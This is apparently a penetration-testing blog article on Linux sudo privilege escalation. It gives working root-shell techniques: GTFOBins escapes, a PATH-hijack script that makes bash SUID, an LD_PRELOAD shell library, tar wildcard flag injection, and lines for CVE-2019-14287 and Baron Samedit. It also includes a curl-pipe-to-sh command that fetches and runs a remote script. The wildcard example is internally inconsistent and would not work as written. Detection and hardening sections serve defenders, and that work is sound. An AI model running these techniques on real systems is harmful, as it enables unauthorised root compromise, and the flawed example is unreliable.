Linux Sudo Privilege Escalation: 8 Paths You Need to Know in 2026

Last updated: April 26, 2026

If you compromise a low-privilege Linux account, the first command you run is sudo -l. The output tells you whether the account can elevate to root through misconfigured sudoers entries, and most of the time the answer is yes. This article walks through the eight sudo-based privilege escalation paths that account for the majority of real-world Linux pentest findings.

The mental model

Sudo is a delegation mechanism. /etc/sudoers says “user X can run command Y as user Z.” Misconfiguration happens when:

• The command Y is too powerful (anything that can spawn a shell, write files, or load arbitrary code)
• The path to command Y is exploitable (writable binary, hijackable interpreter)
• The environment Sudo passes through is exploitable (LD_PRELOAD, PYTHONPATH)
• NOPASSWD makes it convenient and reduces attacker friction

Every PrivEsc check below starts with sudo -l. Read its output carefully — entries listed there are your candidates.

The 8 paths

1. Sudo on a “shell-spawning” binary

Many binaries that look benign can spawn shells. vi, less, more, find, nmap, man, awk, python, perl, ruby, node, tar, zip. If sudo -l shows the user can run any of these as root, you have a path.

# vi
sudo vi
:set shell=/bin/bash
:shell
# Now root.

# less / more (in less): press v during paging
sudo less /etc/passwd
v
:!/bin/bash

# find
sudo find . -exec /bin/bash \\;

# python
sudo python -c 'import pty; pty.spawn("/bin/bash")'

# tar (with checkpoint feature)
sudo tar cf /dev/null /tmp --checkpoint=1 --checkpoint-action=exec=/bin/bash

The catalogue is at GTFOBins. Memorise the top 20.

2. Sudo on a script that calls insecure functions

Custom shell scripts in /usr/local/bin often run with sudo for “convenience.” If the script calls binaries without absolute paths, or sources files without integrity check, an attacker can hijack.

#!/bin/bash
# /usr/local/bin/backup
cp /etc/important.conf /backup/
gzip /backup/important.conf

If cp or gzip is called without absolute path and PATH is preserved by sudoers, replace them with malicious binaries earlier in PATH:

echo '#!/bin/bash
chmod u+s /bin/bash' > /tmp/cp
chmod +x /tmp/cp
export PATH=/tmp:$PATH
sudo /usr/local/bin/backup
# /bin/bash now SUID root

3. PATH preservation in sudoers

Some sudoers entries include env_keep+="PATH" for compatibility. This nullifies the standard sudo PATH reset and lets the path-hijack attack above work even when the script uses absolute paths somewhere else.

4. LD_PRELOAD via env_keep

If sudoers preserves LD_PRELOAD, you can inject a shared library that runs before the actual command:

cat > /tmp/preload.c <<'EOF'
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setresuid(0,0,0);
    system("/bin/bash -p");
}
EOF
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c
sudo LD_PRELOAD=/tmp/preload.so any-allowed-command

5. Sudo with wildcard expansion

If sudoers allows running a command with a wildcard, e.g.:

user ALL=(root) NOPASSWD: /usr/bin/tar -czf /backup/* /var/log

The wildcard expands at shell time. Inject a file named --checkpoint-action=exec=...:

cd /var/log
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=/bin/bash'
sudo /usr/bin/tar -czf /backup/* /var/log
# tar interprets the filenames as flags

6. Sudo on a binary you can write

If sudo -l shows a custom binary path and you can write to that path (or to a directory in its lookup chain), replace the binary.

# Check writability
ls -la /usr/local/bin/customtool
# If writable: replace
echo '#!/bin/bash
/bin/bash -p' > /usr/local/bin/customtool
sudo /usr/local/bin/customtool

7. Sudo policy plugin abuse (CVE-2019-14287)

If the system runs a sudo version older than 1.8.28 and a sudoers entry uses (ALL, !root):

user ALL=(ALL,!root) /usr/bin/some_command

Sudo’s UID parser handles negative numbers oddly. sudo -u#-1 some_command ran as UID -1, which wraps to 0 (root). Patched in 2019 but legacy systems linger.

8. CVE-2021-3156 (Baron Samedit)

Heap buffer overflow in sudo, no sudoers entry needed — any user can exploit. Patched January 2021. We still find vulnerable sudo on legacy CentOS 7 boxes that have not been patched. sudoedit -s '\\' $(printf 'A%.0s' {1..1000}) triggers the overflow on vulnerable versions.

The systematic enumeration

From any low-privilege shell:

# What sudo allows
sudo -l 2>/dev/null

# Sudo version (for known CVEs)
sudo --version | head -1

# Env variables preserved
sudo -l 2>/dev/null | grep -i env_keep

# SUID binaries (related path)
find / -perm -u=s -type f 2>/dev/null

# Scripts executable by all that may have sudo entries
find /usr/local /opt -type f -executable 2>/dev/null

# Run linpeas for full enumeration
curl -fsSL https://linpeas.run | sh

linpeas is the practitioner’s standard. Run it. Read the output. The “Most” interesting findings are highlighted.

Detection — what defenders should do

• auditd rules on /etc/sudoers and /etc/sudoers.d/ — alert on any modification.
• Process accounting — track every sudo invocation, the command run, the user. Anomalous patterns (rapid sudo to many commands, sudo to shell-spawning binaries) are tells.
• SUID file integrity monitoring — any new SUID binary should fire an alert.
• EDR with Linux coverage (CrowdStrike, SentinelOne, Defender for Linux) — most catch GTFOBins-style escapes via behavioural analysis.
• Sudo logging to remote SIEM — local logs can be tampered with after exploitation.

Hardening recommendations

• Audit /etc/sudoers for entries allowing shell-spawning binaries. Replace with tight, command-specific entries.
• Avoid env_keep for security-sensitive variables (PATH, LD_PRELOAD, LD_LIBRARY_PATH, PYTHONPATH).
• Use absolute paths in custom scripts called via sudo.
• Patch sudo regularly — sudo CVEs come up. Keep up.
• Replace sudo with doas on hardened boxes — smaller attack surface, fewer features, fewer bugs.
• Implement just-in-time sudo — temporary, time-bound, audit-logged sudo grants instead of permanent sudoers entries.

How to find your next path

For attackers:

• If sudo -l reveals nothing, check group memberships (id) — disk, sudo, lxd, docker, video groups can each lead to root via different paths.
• Check capabilities (getcap -r / 2>/dev/null) — binaries with cap_setuid or cap_dac_read_search bypass standard SUID restrictions.
• Cron jobs running as root that touch user-writable paths.

For defenders:

• Run linpeas against your own production hosts. Findings are your hardening backlog.
• Review /etc/sudoers entries quarterly with the principle “if this user account were compromised, what could they do?”

Compliance angle

• RBI Cyber Framework — privileged access management requires audited, minimal sudo grants.
• SEBI CSCRF — Linux server hardening is part of expected baseline.
• ISO 27001:2022 A.5.16, A.8.5 — identity and access management.
• CIS Linux Benchmark — extensive sudoers configuration recommendations.

The takeaway

Sudo misconfiguration is the most reliable Linux PrivEsc path because it is the most overlooked. Sysadmins write sudoers entries for convenience and forget them. Run sudo -l on your own production hosts; the output is the auditor’s first question and the attacker’s first action. Tightening these entries is some of the highest-leverage Linux hardening work available — measurably more impactful than the next vulnerability scan.